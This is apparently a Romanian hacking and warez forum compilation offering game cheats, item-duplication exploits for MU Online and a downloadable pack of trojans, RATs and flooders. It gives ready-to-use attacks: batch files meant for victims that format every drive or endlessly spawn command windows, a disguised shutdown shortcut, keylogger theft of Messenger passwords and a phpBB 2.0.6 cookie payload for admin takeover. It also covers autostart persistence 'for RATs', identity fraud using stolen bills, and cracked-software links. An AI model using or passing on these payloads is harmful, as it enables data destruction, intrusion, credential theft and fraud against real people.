Mu Hacks!Super Tare!

http://dizzydbd.freewebsitehost.net/StatsHack.php[url]



Valute Blaster:



[url=http://dizzydbd.freewebsitehost.net/VaultHack.php]http://dizzydbd.freewebsitehost.net/VaultHack.php




1)Mu bot HahaMU





este aplicatzia mea preferata potzi sa intri cu cate conturi vrei u fara sa ai lag sau sa ti se sacadeze

as putea spune ca face cat tot clientul de mu plus multe alte functzi

te potzi teleporta pe ce coordonate vrei vrei u de pe harta pe care te afli

potzi face party perfect intrnd cu mai multe conturi

il lasi afk iar botul vb se plimba ,omoara , da buf , aduna itemele dorite, goleste inventori etc. ...



putetzi downloada de aici =>http://www.filehost.ro/90418/HahaMu_rar/








2)Data1



dupa ce dezarhivezi copiezi din data1 world 1, ,2 ,3 si le pui in data
clientului de mu care il doresti si vei putea sa alergi, in oras si sa
ataci monstri ornamentali care mai sunt pe unele servare.
player-i si admini te pot vad cand ataci in oras si potzi sa iei BAN



putetzi sa dawnloadatzi de aici=> http://www.filehost.ro/90413/Data_rar/





3)World7



dezarhiveaza si copiaza tot directorul World7 in data din clientul tau
si vei putea sa intri in tarkurile din arena indiferent ca itzi faci mg
elf sau bk fara ajutorul unui sm


putetzi dawnloada de aici=> http://www.filehost.ro/90415/World7_rar/







4)MU pie



Cum folosesti MU pie:



iti trebuie neaparat dotnetfx.com e un update al

windowsului il gasesti pe net are vreo 20Mb



Setari Mupiex



la SETTINGS

MuOnline Server

ip ==>adresa serverului respectiv sau ip-ul lui port 44405

version "dont know"



MuLuncher

MuOnline Path : linkul catre main.exe ex:

ex;D:GamesMuOnlinemain.exe



Mupie Settings

lasi pe auto config



GAME PLAY

este one hit hack si auto-kill

pentru 1hh decat setezi Hit Count si apesi Apply hit

count=1 la 500 in functie de viteza de la net

auto-kill nerecomandat



TELEPORTATION

te muta oriunde pe harta pe care esti exemplu dai

/warp stadium scrii coord si intri in arena de la lvl

50



PACKETS TOOLS

pentru dupe explicatia mai jos



Cum se face dupe :

copiezi winmode in 2 locuri diferite exemplu

d:gamesmuonlinewinmode1 si d:gamesmuonlinenew

folderwinmode2

deschizi jocul normal apesi F12 (nu apesi si F11 sa il

bagi in bara) trebuie neaparat sa ai alta rezolutie la

windows decat aia de la joc sa poti schimba ferestrele

intre ele windows eu tin jocu pe 1024x768 si windowsu

pe 1152x864. Apoi deschizi Mupiex si winmode-ul al

doilea faci setarile si apesi la Lunch Mupiex apoi

Lunch Muonline si deschizi jocu apesi F12 acum ai 2 Mu

deschise.

Pentru a face dupe trebuie sa capturezi pachetul cu

cancel de la trade ... dai trade cu caracterul deschis

normal bifezi la Packets Tools "Capture packets" dai

cancel la trade cu caracterul deschis cu mupiex apoi

debifezi "Capture Packets" in lista de packete va

trebui sa iti apara un packet den C1 xx xx BE (xx e

ceva nush exact oricum nu il poti confunda) daca nu

ti-a aparut ceva nu ai facut bine dai clear packets si

faci iara. Acum ai tot ce iti trebuie pentru a face

dupe. In caracterul deschis cu mupiex pui ce vrei sa

dupezi jw/bok/iteme dai trade intre ele , dai accept

la trade cu caracterele in trade dai din mupie send to

server pe packetul ala C1 ... BE pe caracterul deschis

fara mupiex iti va aparea Trade Canceled dar va ramane

in trade, pe caracterul cu iteme de dupat le pui toate

in stash apoi dai trade iara intre ele, dai accept

apoi dai cancel ... acum ai de 2 ori itemele de le

aveai inainte in inventary , originalele in stash si

copiile in inventary (asta e dupe).



IMPORTANT:



IN NICI UN CAZ SA NU PUI UN ITEM DUPAT IN ACELASI LOC

CU ORIGINALU - DACA AI FACUT ASA AI PIERDUT CONTU SI

TOT CE E PE EL E BANAT SIGUR.

IN NICI UN CAZ SA NU PASTREZI DUPE-URILE FACI JW LE

FOLOSESTI IMEDIAT FACI BOK LE ARUNCI PE LOC FACI ITEME

LE BAGI LA MASHINA DACA IES VINZI ORIGINALU DACA PICA

FACI IARA DUPE SI INCERCI IARA ... AI GRIJA ATUNCI

CAND IESE LA MASHINA CUM VINZI ORIGINALU SA NU FIE IN

ACELASI LOC AMANDOUA.

REPET SA NU PASTREZI ORIGINALU SI DUPE NICI MACAR JW.

FACI JW LE FOLOSESTI IMEDIAT SA NU CUMVA SA DAI LA

TRADE CA E BAN SIGUR ... ORIGINALU SI DUPE AU ACELASI

COD DACA DISPARE 1 NU AU DOVADA DE DUPE DACA SUNT

AMANDOUA E BAN PENTRU AMANDOI.



putetzi sa dawnloadatzi de aici=> http://www.filehost.ro/90420/mupie_zip/







5)Aflarea ip-ului



intratzi in mu cu windows mode,minimalizatzi,

dupa care vetzi intra in cmd care il vetzi gasi in Start =>run program=>dupa care vetzi scrie cmd apoi vetzi da ok

vi se va deschide o fereastra gen dos unde vetzi scrie netstat -n

o s ava apra acolo mai multe ip-uri ,pe voi o va intereseaza celecare arata ceva de genul



xxx.xxx.xxx.xxx:44405 TIME_WAIT



xxx.xxx.xxx.xxx:55901 ESTABLISHED





xxx.xxx.xxx.xxxva fi ip-ul servarului

-------------------------------------------------------------------------------------------------------------------------------------------------

ATENTIE!! pt a putea va reushi cu succes hackurile de la ( 6,7 ) ,
serverul respectiv nu trebuie sa aiba fire wall!! iar de fire wall nu
putetzi trece











6)stats blast hack (stats editor)





in cazul incare serv nu are fire wall

avetzi nevoie de ip serv si de un caracter existent in baza de date



pt a va pune full stats sau cat doritzi intrazi aici => http://blastz.allhyper.com/Stats.php


ATENTIE: Toate itemele de pe char sau din inventarul acestuia vor fi sterse.

Numele caracterului o sa aiba o culoare ciudata(albastru verzui) ....

faceti PK cat de repede puteti





7)Vault blast hack

acest hack se poate folosi numai daca servarul nu are fire wall



pt a putea folosi acest hack trebuie sa cunostetzi ip serv , sa avetzi un caracter existent in baza de date ,

si sa avetzi programelul itemproject pe care il putezi dawnloda de aici => itemai rar





iar apoi sa intratzi aici => http://blastz.allhyper.com/Vault.php

vetzi putea sa va punetzi absolut orice item in valut cu ce optiuni vretzi









9)speed hack



Pt a dawnloda datzi click aici => http://www.filehost.ro/90498/speed_hack_winmode_rar/







10)Dupe method in 99b

First put your items on the vault.Then, go back again and open the vault.

Afterwards,

1. Get your items by using right click and then press "D" at the same time

2. Press "P"

3. Press "T"

4. open your vault again and see your item dupe

Easy right!!!

The one in the vault will be the original one and the one in the
inventory will be your dupe item.Dont put them on the same place near
each other or youll be banned or dc







1.Dupe BUG



Dupe cu Angel Messenger (bc angel)



- merge doar cand BC-ul este DESCHIS



- este nevoie de 2 oameni sa zicem A si B



- A ia itemele care vrea sa le dupeze in inventory si o invitatie pt bc-ul corespunzator lvl-ului



- A si B se duc la inger, A face click pe el dar nu apasa sa intre



- B ii da trade, A accepta



- A apasa sa intre in BC (trade-ul deschis) dar nu intra, doar il da in locul ingerului



- A se duce la vault si pune intemele care vrea sa le dupeze in vault



- B ramane cu trade-ul deschis pana A intra in acelasi ecran cu el, atunci da cancel trade



- A ii da trade lui B, B accepta si amandoi dau OK la trade





-Atentie sa nu cumva sa punetzi itemurile dupate in locul celor
''bune''pt ca vetzi fi prinzi si va mai recomand sa nu dupatzi decat
bok sau jwl care le vetzi folosi cat se poate de repede.

Program care iti elibereaza RAM!

http://files.filefront.com/FreeRAM+XP+Pro+140rar/;11117639;/fileinfo.html

Hack-Pack!!

Contine :

Golden Eye

Crackers Kit

CIA Commander

Host Scan

Net Tools

Soft Ice

Google Hacker

Chain & Abal

Access Driver

Athena

MM Virus Gen

H. Account Freezer

BrurusAFT

SubSeven

Creator16

AATools v.5.50

NFOTools

MD5

Haking Utilites

Windows keeygen

Pach Kit

Acsii Factory

Cool Beands NFO Creator

Dizzy

Feuer’s NFO File Maker

Ims NFO&Diz Maker

Inserter

NFO Creator

NFO Maker

Compiled SNID Server

Donut HTTP Flooder

Net Metropolitan

Netbus 1.70

NetShere

Passgen

DAV

Net Contriller

Net Raider

Netbus 2 Pro

Sprut

Tosser

RockXP3

WinAll keeygen

WinXP CD keeygen

KeyFinder

XPProCorp-KeyChanger

CodeFusion Wizard

Pach Creation Wizard

Predator’s EL Generator

RTD Win Pach Engine

Yoda’s Process Pacher

FastPach

Pach on Fly

Rlzer

Tola’s Paching Engine

Huge Haking All In One

Http Bomber 1.001b

WinCrash 2.0

wwwhack 1.913

ShadowsSecScanner

NetBus 2.0b Pro

Kuang2 Client 0.21

WebCracker 4.0

Vampire 1.2

SubSevenv 2.1 Gold Edition

ShadRemAdministrator

SchoolBus 1.85

Hack ‘a’ Tack 1.20

DeepThroat 3.1

BackDoor 2.0

PSourse

Kuang the virus

k2psf

Spider 1.1.6.0

DoraahWerEngine

back orifice source

netbus 153src

BadBoy Killer

Hotmail Email Haker

Port & IP Scaner

Crash Hard Disk

Ping & Nukes

Credit Crad Generator

HttpFlooder

Site_nuke

MailBomb

Keyboard Key Logger

Password Recovery

PingFlooder

httpf**ker

si mai multe...

54270 KB

http://rapidshare.com/files/34174398/hgek4xingapp1i57.zip
Sunt Niste Chestii Foarte Interesante :evil: Twisted Evil Twisted Evil :suspect:Sa Le Incercatzi!

Sterge Comenturile De La Hi5!

in spatiul de pe hi5 unde lasi commenturi ... lasi commu' asta :

Cod:

Sterge Comentariul Sau Poza De PE Hi5!

Cod:

Modifici Internet Explorer Cum vrei U!:P

1. Descide Computerul meu (My computer)

2. Dute la C:\Program Files\Internet Explorer\SIGNUP\

3)Modifica numele fisierului 'INSTALL.INS' in 'INSTALL.txt' si descidel in notepad

4.Dute putin mai jos si vei gasi:'Window_Title=Microsoft Internet Explorer', acum scimba Microsoft Internet Explorer in ce vrei tu (Ai grija ! numai Microsoft Internert Explorer. Nu Window_Title= ! nu umbla la nimik alteva.)

5.salveazal si modifica iara numele in 'INSTALL.INS' ,dupaia descidel si daca te intreba daca vrei sa modificati setarile internetului, Apasa OK.

6.Dai un restat si esti gata

Cum Poti inchide Un PC!

1. Dati click dreapta oriunde pe desktop, si selectati New si pe urma shortcut.

2.In spatiul pentru adresa scrieti urmatoarele shutdown.exe -s -t 20 -c "aici scrieti mesajul ce va aparea victimei"

3.pentru a fi mai eficient setati timpul dorit(secunde)pana la inchiderea PC-ului victimei inlocuiti 20 cu numarul dorit

4. Dati next si alegeti numele dorit pentru a pacali victima dupa care dati finish

5 Dati click dreapta pe noul programel creat si schimbatii iconita cu una potrivita.

Pe urma mai ramane sa trimiteti la cineva pe messenger acest "programel" ca sa`i stingeti pc. Razz
Mult Succes La hack!Wink

Cum Sa Spargi Parola la un Id De Mess!

Vrei sa afli parola de yahoo mess a altcuiva:
Pentru a afla parola de mess a altcuiva exista mai multe variante insa
nu le voi prezenta aici ! Singura varianta pe care v-o pot arata
presupune instalarea unui program pe care unele antivirusuri il poate
detecta ca troian.
Acest program inregistreaza toate tastele apasate la un calculator si
se numeste Family Keylogger. Deci pentru a afla parola trebuie sa
invitati persoana nefericita la un calculator care are instalat
keylogger-ul. Programul de aflat parole, de fapt ce a fost tastat se
poate descarca de Aici http://www.spyarsenal.com/

Flood Ms-Dos!

1Intrati in NotePad si scrieti urmatorul cod:

Cod:

@echo off
cls
:start
start C:\windows\system32\cmd.exe
goto start




2.Dati save as cu extensia Flood.bat

3.Dupa ce il salvati puteti sa`l trimiteti la alte persoane.

Aflare IP Messenger!

http://www.mediafire.com/?di1ubpoj1xy

Cu acest program poti afla IP celor de pe Messenger.


Bafta la aflat IP

Hack Ce Sterge Orice Prinde!

Deci ce aveti de facut : start > all programs > accesories > notepad in notepad scrieti asta @echo off
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
format t: /q /y > dupa accea aveti de facut asa File > Save as > la Save as type selectati "ALL FILES" la File name ii dati voi un nume si dupa nume fara spatiu fara nimika .bat ! Exemplu : ReebocK.bat

Y!mess Funny!

Cu acest script iti bati joc de cineva

Ce poate face scriptul:
Cand
victima deschide scriptul ai va aparea niste mesaje (arata ca o
eroare)Victima nu poate da close ci doar OK iar dupa ultimul mesaj ai
va da o eroare dupa care in 10 sec i se va inchide pc-ul pt 1 minut 2

Utilizare:
Il trimiti la cineva pe mess si incerci sal fraieresti spunandu-i ca
eex:un bank.......)vedeti voi apoi ai spuneti sa-l deschida

Have Fun!

..:::DOWNLOAD LINK:::..
http://www.mediafire.com/?ahundm1xyom/
Mult Succes!

Yahoo Webcam Recorder

oRipa Yahoo Webcam Recorder is a handy tool to record Yahoo webcam video and audio of chat partner to your PC hard disk so you can replay it in ***ure. Just press the record button as the Yahoo webcam is connected, and the video streams are saved as media files in your preset folder. You can play the recorded videos back at any media player and at any time you like! Here's why oRipa Yahoo Webcam Recorder is the ultimate webcam recorder for Yahoo Messenger.

1. Work with Yahoo Messenger 6.0 and the above versions.
2. Real time record Yahoo webcam with optional sound recording (e.g. audio from microphone)---You can record any webcam streams (e.g. the fun movies broadcasted in webcam by your chat partner as well as the video conversations, etc.)
3. Real time compress your recorded videos (DivX compatible) during recording --- use this function to get a smaller file size of your output videos so there is no need to worry your hard disk space is not enough for your video files when you record for a long time!
4. Save recorded videos into AVI format files---you can use any player (e.g. Real, Windows Media Player, etc.) you have to play the recorded video.
5. You can minimize or hide the Yahoo Messenger window while recording.---That means You can browse other web pages and no need to let your Yahoo webcam window always on the front web page.
6. Easy to use!---You just start/stop recording with a click from the icon menu. No need to know about the recording knowledge.
7. Other cool features you would prefer: adjustable FPS and frame size (for you to adjust your output video quality) and user defined save-to directory.

download
Code:

http://rapidshare.com/files/194260723/Yahoo_Webcam_Recorder._with_crack.rar

Advanced SystemCare Professional v3.1.2

Slow down, freeze, crash and security threats are over. Advanced SystemCare Personal is a comprehensive PC care utility that takes an one-click approach to help protect, repair and optimize your computer. Scanning and finding what other utilities miss, it can keep your PC error-free and smooth than ever. This fantastic program is available free of charge.

Compared with its nearest competitor, Advanced SystemCare Personal provides the more essential and practical formula for Windows:

• One-click Per Day
• Removing Spyware and Adware
• Preventing Security Threats
• Privacy Protection
• Fixing Registry Errors
• Temporary Files Cleanup
• Startup Cleanup
• Repairing Windows
• Speeding up System

download
Code:

http://rapidshare.com/files/195412482/Advanced.System.Care.PRO.v3.1.2_DGN___VENGENCE.r

Photodex ProShow Gold 4.0.2477 Portable

ProShow Gold is the complete slide show software solution for sharing your best memories on DVD, PC, and the Web!
Bring still photos to life by adding motion effects like pan, zoom, and rotate. Add captions to a photo or video and choose from over 280 exciting transition effects. It's easy to tell your story with ProShow Gold.

Create slide shows for any occasion! Use ProShow Gold to easily create stunning slide shows for friends, family, business, or just for fun! Just select your photos and drop them in the show. Record your own voice-over track or add a soundtrack from a CD. Add motion effects and pick from over 280 stunning transition effects to add that final touch.

Take your photos further! ProShow Gold gives you more output options than any other slide show software. Create DVDs and video CDs that play back on your TV. Stream your show on the Web. Generate MPEG video files for PC viewing. Build screen savers for yourself or others. Make self-contained executable slide shows (EXEs), perfect for e-mailing or posting online. Write PC autorun CDs that automatically play when inserted into a PC. ProShow Gold does it all!

Amazing Effects! ProShow Gold allows you to add motion effects to your images and video. Zoom in to points of interest. Pan around on a panoramic image. You can even rotate a photo or video while the slide show is playing.

FEATURES:

Add and Edit Content Easily
- New! Add an unlimited number of layers to any slide
- Drag and drop to easily add content to a show
- Supports 100+ file types
- Transparency support for PSD, PNG, TIFF and GIF files
- Built-in video trimmer crops video clips precisely
- New! Make good photos great with editing tools including crop, red-eye removal, rotate, flip, sharpen, drop shadow, colorize, etc.
- One-click color correction automatically optimizes your photos
- Set custom timing for each slide or modify many slides at once.

Special Effects that Amaze
- New! Bring any photo to life with motion effects
- Pan photos, including panoramic; rotate photos to any angle
- Precise motion control—use composition lines for perfect alignment
- New! Scale/zoom photos to any size with increased zooming range
- Set acceleration styles for motion effects
- New! Choose from 280+ transition effects—specify the random transition effects feature to only the styles you want
- Control timing for each transition
- Randomize motion and transition effects for your slide show in seconds
- Add an unlimited number of captions to enhance your show
- Set captions to any font, size, style and color
- New! Add fun to your captions—choose from the expanded set of 100+ caption effects, including the iconic Galactic Scroll

Use Music to Set Any Mood
- New! Create a soundtrack instantly by adding any MP3, WMA or WAV file to your show - you'll see the waveform in the slide list
- Import music from any audio CD with the built-in audio ripper
- Use the built-in audio trimmer to crop songs and add fades
- Add audio clips, such as sound effects or voice overs, to any slide
- Record voice-over narrations for documentary-style effects
- Control volume for your soundtrack and audio clips independently
- Sync your slide show to your music with one click

Fast and Easy Show Creation
- New! Timeline view makes it easier to control the timing in your show
- Automatic show backup and recovery keeps work safe
- Collect show files to any folder, CD or DVD for archiving
- New! Built-in editing and output tools minimize the need to switch back and forth between 3rd party programs
- New! Favorites Pane makes important folders easily accessible
- Unlimited Undo and Redo

Share Shows Virtually Anywhere
- Fully-integrated media authoring for DVDs/VCDs/CDs
- Enhanced Hollywood-style menuing for DVDs and PC playback
- Combine both TV and PC playback on the same disc
- Custom aspect ratio controls support 4:3 and widescreen formats
- Anti-flicker filtering reduces flickering issues common in video output
- Avoid TV clipping with integrated Safe Zone preview
- Supports NTSC and PAL for international playback compatibility
- Upload and share your shows online for FREE at photodex.com

ProShow Gold Output Formats
- DVD (with PC playback)
- VCD (with PC playback)
- Autorun CD
- Self-contained EXE
- Share shows via email
- Streaming web shows
- Free online show sharing
- New! Streaming Flash video
- New! High Definition video (HD)
- New! Windows Media Video (WMV)
- MPEG 1 and 2
- Screensavers

Changes in Version 3.2.2039, November 13, 2007:
* Added option to create Video for Devices
* Added option to create video for YouTube
* Fixed problem where Slide Options could fail to display all layers
* Enhanced the Download Extras feature to increase usability
* Fixed crash condition caused by Duplicate Layer feature

download
Code:

http://uploading.com/files/UDAWCIKB/Photodex_ProShow_Gold_4.0.2477.rar.html
Mirror
http://uploadbox.com/files/R333Okxwdo
Mirror
http://www.easy-share.com/1903573366/Photodex_ProShow_Gold_4.0.2477.rar

JDownloader 0.4.464 Portable

Acest rezumat nu este disponibil. Dați clic aici pentru a vedea postarea.

Protect your valuable data by locking your PC with just a double click.

These days, computers are everywhere: from banks and government offices to shops and homes. People tend to rely on tireless machines more and more every day.

We store our valuable data, personal and business-critical information, photos, credit card information, important phone numbers and vast amount of other private information on our hard drives. We install firewalls and anti-virus software to protect this data from outside intrusions and hijacks.

However, according to reports by IT specialists, the majority of electronic data theft crimes happen due to improper protection of computer systems from the inside. Human factor is still the greatest security issue today.

download
Now you can see what's hiddenhttp://rapidshare.com/files/195363538/LockMyPC.4.0.5.577_DGN___VENGENCE.rar

Cum sa faci bani la Conquiztador

Ii simplu, doar trebuie sa iti faci 3 useri Conquiztador (cu 2 in plus de cel principal), te loghezi cu fiecare si te angajezi in jocuri pe care le controlezi cum vrei tu !
Nu va merge sa faceti userii cu acelasi e-mail !
Si daca nu merge sa va logati de pe acelasi ip folositi proxy

P.S: Am descoperit asta cand ii face-am account de CQ la soramea

Steam cu multe jocuri

Code:

ftp://warezbb.ro:privat0deci1nu2publica3linkul4ca5iti6iei7BAN@mup.wftp.org/2. JOCURI/Steam Cs (multe jocuri)

contine majoritatea jocurilor , cele mai importante:
Counter Strike (1.6)
Half-Life
Counter Strike Condition Zero
Counter Strike Condition Zero Deleted Scenes
Counter Strike Source
Counter Strike Source Beta
DoD (Day of Defeat)
DoD Source
Half Life 2
Half Life 2 : Episode One
+multe altele[/list:u]

Credits: -PoT-Cr3w


mirror:
Mirror
Owned =)) am pus killcode in loc de download code .. il uploadez iar
pass:

DeXter@warezbb.ro



Added after 28 minutes:

Cod:
http://rapidshare.de/files/23693665/steam4wbb.rar.html
http://rapidshare.de/files/27430171/steam4wbb.rar.html

Cum spargi phpbb 2.06

Deci,azi va invat cum sa spargeti phpbb 2.0.6.De fapt cum sa va faceti admin pe un forum powered by phpbb 2.0.6 .E foarte usor.

Deci,search pe google:"powered by phpbb 2.0.6".
Ai gasit un forum?
Acum deschide siteu cu internet explorer.
Intra in programul asta...care e de fapt un cookie editor.

IE cookie editor:
Quote:
http://rapidshare.de/files/21550648/iecv.rar.html
Click pe forumul care lai gasit si pe care il gasesti in lista la cookie editor.
Acum dai click dreapta pe butonul de dedesubt care ti-a aparut->"Edit the cookie content"->si modifica "a:0:{}" in "a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2"; }".
Acum intra din nou pe forum,tot cu IE,si poti intra in panoul administratorului
PS nu merg la toate care sunt 2.0.6

Cum sa treci de filtrul google

Nu stiu daca s-a mai postat asa ceva, acest tutorial este facut de mine, dupa ce am auzit de undeva ca trebuie sa folosesc custom search engine.

Dupa cum probabil ati observat google filtreaza cautarile gen intitle:"index of" . Pentru a scapa de aceasta restrictie mergeti pe : www.google.com/cse . Va faceti aici un custom search engine ( la url's scrieti pe fiecare linie :
.com
.net
.ro etc.
astfel va cauta in tot domeniul )

, dupa aceea intrati din management in homepage.

De acum in continuare merg majoritatea searchurilor dar pentru unele merge doar prima pagina.

Daca incerc intitle:"The Non Designer's Web Book" voi primi eroare daca incerc sa accesez a 2-a pagina.

Aveti 2 optiuni : ori puteti viziona pagina cu pagina sau cate 100 de searchuri de-odata.


1.Pagina cu pagina.

Pentru primul search voi avea linkul : http://www.google.com/cse?cx=0132921...k%22&sa=Search


inainte de &sa=Search ( de la final ) scrieti &start=10 si o sa ajunga asa :

http://www.google.com/cse?cx=0132921...t=10&sa=Search

Pentru a 3-a pagina in loc de 10 scrieti 20 si-asa mai departe



2.Cate 100 rezultate pe o singura pagina.


dupa &q=intitle%3A%22The+Non+Designer%27s+Web+Book%2 2 adaug

&as_epq=&as_oq=&as_eq=&num=100&lr=&as_filetype=&ft =i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=an y&cr=&as_nlo=&as_nhi=&safe=images

si va ajunge :

http://www.google.com/cse?cx=0132921...i=&safe=images

Daca sunt mai multe pagini puteti folosi tehnica de la punctul 1.

Vrei sa faci ca si cum un calculator s-a conectat la un anumit site si nu stii cum?

Vrei sa faci ca si cum un calculator s-a conectat la un anumit site/server TCP?

Raspunsul la intrebare este insusi acest post, dar o sa mai explic si alte mici parti ale conexiunilor TCP (adica folosind protocolul TCP), adica majoritatea conexiunilor.
Acest post explica baza unei conexiuni (desi multi fac programe prin care un client se conecteaza la server fara sa stie de fapt ce se intampla).

Nu este mare lucru, dar ideea de baza de aici poate fi folosita pentru a face atacuri complexe si efective.

In mod normal pentru ca sa faci o conexiune TCP/IP trebuie sa trimiti un pachet SYN, sa primesti unul SYN+ACK si sa o inchizi cu ACK.

Noi nu avem cum sa primim SYN+ACK ca sa "inchidem" conexiunea.

Poate va intrebati "Ce este asa de important in acel pachet?"
Raspunsul este acknowledgment number (care este important doar daca primim ACK), un numar pe care trebuie sa il trimitem inapoi ca sa aratam ca noi suntem cu adevarat calculatorul care a trimis cererea de conexiune.

Dar, folosind wireshark oricine poate observa ca acel numar este aproape intotdeauna 1.

Asa ca putem face acest lucru usor.

1. Folosind ip-ul victimei si portul X tu trimiti un pachet cu care arati ca vrei sa faci o conexiune noua (SYN).
2. Trimitem pachetul cu SYN+ACK aproape imediat (nu vrem sa ajunga primul, pentru ca desi rar, se mai intampla).
3. Dupa aceea putem trimite de exemplu cererea unei pagini cu un pachet simplu si date: "GET /index.html HTTP/1.1" .

Dupa aceste 3 pachete TCP/IP victima o sa primeasca pe portul X un pachet SYN+ACK (cel pe care noi l-am ghicit) si continutul paginii index.html de pe serverul pe care am deschis noi conexiunea si poate si alte pachete ca RST (in cazul in care serverul vrea sa reseteze conexiunea) sau FIN+ACK in cazul in care vrea sa o inchida (asta se intampla la serverele web, serverul vrand sa inchida conexiunea imediat dupa ce a trimis continutul paginii).

Ca sa nu las oarecum neterminat (pentru ca orice conexiune se si inchide) o sa incerc sa explic si cum se inchide o conexiune.

Acest lucru este un pic mai complicat (si nu o sa poti ghici asa de usor acknowledgement number).
Notam calculatorul care vrea sa inchida conexiunea cu A si pe celalalt cu B.
A ii trimite lui B FIN+ACK;
B ii trimite lui A ACK;
B ii trimite lui A FIN+ACK;
A ii trimite lui B ACK.

Dar dupa ce te-ai conectat nu mai poti ghici acknowlidgement number ca sa inchizi conexiunea. (cel putin eu nu am reusit)

Este facut de mine de la 0 din ceea ce am citit pe wikipedia, dar am mai folosit si wireshark ca sa observ reteaua, netul sau simple programe ale mele.

Astept pareri.

53 de cai pentru a pune programul tau in StartUp

Lista e buna pentru cei care fac RAT's sau programe care pornesc cu Windows-ul.

Code:

Registry Autostart Locations

1.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\
All values in this key are executed.
2.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce\
All values in this key are executed, and then their autostart reference is deleted.
3.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\
All values in this key are executed as services.
4.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce\
All values in this key are executed as services, and then their autostart reference is deleted.
5.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\
All values in this key are executed.
6.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\
All values in this key are executed, and then their autostart reference is deleted.
7.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\Setup\
Used only by Setup. Displays a progress dialog box as the keys are run one at a time.
8.

HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\Run\
Similar to the Run key from HKEY_CURRENT_USER.
9.

HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\RunOnce\
Similar to the RunOnce key from HKEY_CURRENT_USER.
10.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
The "Shell" value is monitored. This value is executed after you log in.
11.

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\
All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey.
12.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\VxD\
All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey.
13.

HKEY_CURRENT_USER\Control Panel\Desktop
The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates.
14.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\Session Manager
The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts.
15.

HKEY_CLASSES_ROOT\vbsfile\shell\open\command\
Executed whenever a .VBS file (Visual Basic Script) is run.
16.

HKEY_CLASSES_ROOT\vbefile\shell\open\command\
Executed whenever a .VBE file (Encoded Visual Basic Script) is run.
17.

HKEY_CLASSES_ROOT\jsfile\shell\open\command\
Executed whenever a .JS file (Javascript) is run.
18.

HKEY_CLASSES_ROOT\jsefile\shell\open\command\
Executed whenever a .JSE file (Encoded Javascript) is run.
19.

HKEY_CLASSES_ROOT\wshfile\shell\open\command\
Executed whenever a .WSH file (Windows Scripting Host) is run.
20.

HKEY_CLASSES_ROOT\wsffile\shell\open\command\
Executed whenever a .WSF file (Windows Scripting File) is run.
21.

HKEY_CLASSES_ROOT\exefile\shell\open\command\
Executed whenever a .EXE file (Executable) is run.
22.

HKEY_CLASSES_ROOT\comfile\shell\open\command\
Executed whenever a .COM file (Command) is run.
23.

HKEY_CLASSES_ROOT\batfile\shell\open\command\
Executed whenever a .BAT file (Batch Command) is run.
24.

HKEY_CLASSES_ROOT\scrfile\shell\open\command\
Executed whenever a .SCR file (Screen Saver) is run.
25.

HKEY_CLASSES_ROOT\piffile\shell\open\command\
Executed whenever a .PIF file (Portable Interchange Format) is run.
26.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\
Services marked to startup automatically are executed before user login.
27.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\
Layered Service Providers, executed before user login.
28.

HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline
Executed when a 16-bit Windows executable is executed.
29.

HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline
Executed when a 16-bit DOS application is executed.
30.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Executed when a user logs in.
31.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\ShellServiceObjectDelayLoad\
Executed by explorer.exe as soon as it has loaded.
32.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
Executed when the user logs in.
33.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Executed when the user logs in.
34.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\run\
Subvalues are executed when Explorer initialises.
35.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\run\
Subvalues are executed when Explorer initialises.


Folder Autostart Locations

1. windir\Start Menu\Programs\Startup\
2. User\Startup\
3. All Users\Startup\
4. windir\system\iosubsys\
5. windir\system\vmm32\
6. windir\Tasks\


File Autostart Locations

1. c:\explorer.exe
2. c:\autoexec.bat
3. c:\config.sys
4. windir\wininit.ini
5. windir\winstart.bat
6. windir\win.ini - [windows] "load"
7. windir\win.ini - [windows] "run"
8. windir\system.ini - [boot] "shell"
9. windir\system.ini - [boot] "scrnsave.exe"
10. windir\dosstart.bat
11. windir\system\autoexec.nt
12. windir\system\config.nt

Bafta!

Social engineering - domenii .ro

Nu stiu daca s-a mai gandit cineva la asta pana acuma, dar eu... pardon, unii oameni au folosit aceasta metoda si inca o mai folosesc cu succes.
Ma refer bineinteles la obtinerea de domenii .ro .com .net si .org.
Problema se pune in felul urmator:
Puneti mana pe o factura de Vodafone, optional una care apartine unei persoane care v-a suparat tare de tot, nu va spun cum ca atata va duce mintea plus ca furtul de corespondenta este o infractiune si este pedepsita ca atare
Bun, sa zicem ca aveti factura in mana, ia sa vedem ce informatii va ofera aceasta:
Nume
Prenume
Adresa
